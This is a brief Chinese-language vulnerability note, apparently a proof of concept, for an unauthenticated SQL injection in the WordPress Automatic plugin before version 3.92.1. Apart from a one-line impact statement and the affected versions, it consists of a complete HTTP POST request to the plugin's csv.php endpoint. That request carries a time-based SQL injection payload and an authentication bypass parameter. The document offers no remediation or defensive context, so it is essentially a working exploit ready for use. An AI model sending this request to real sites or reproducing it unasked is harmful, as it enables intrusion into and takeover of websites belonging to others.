WordPress Automatic插件存在未授权SQL注入漏洞,远程攻击者可以利用它获得对网站的未经授权访问,创建管理员级别的用户帐户,上传恶意文件,并可能完全控制受影响的网站。
WordPress Automatic插件版本<3.92.1
POST/wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1
Host:host
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept:*/*
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding:gzip, deflate
Content-Type:application/x-www-form-urlencoded
Connection:close
q=SELECT+IF(1=1,sleep(3),sleep(0))&auth=%00&integ=111626f5f910d38cf6de27181780707e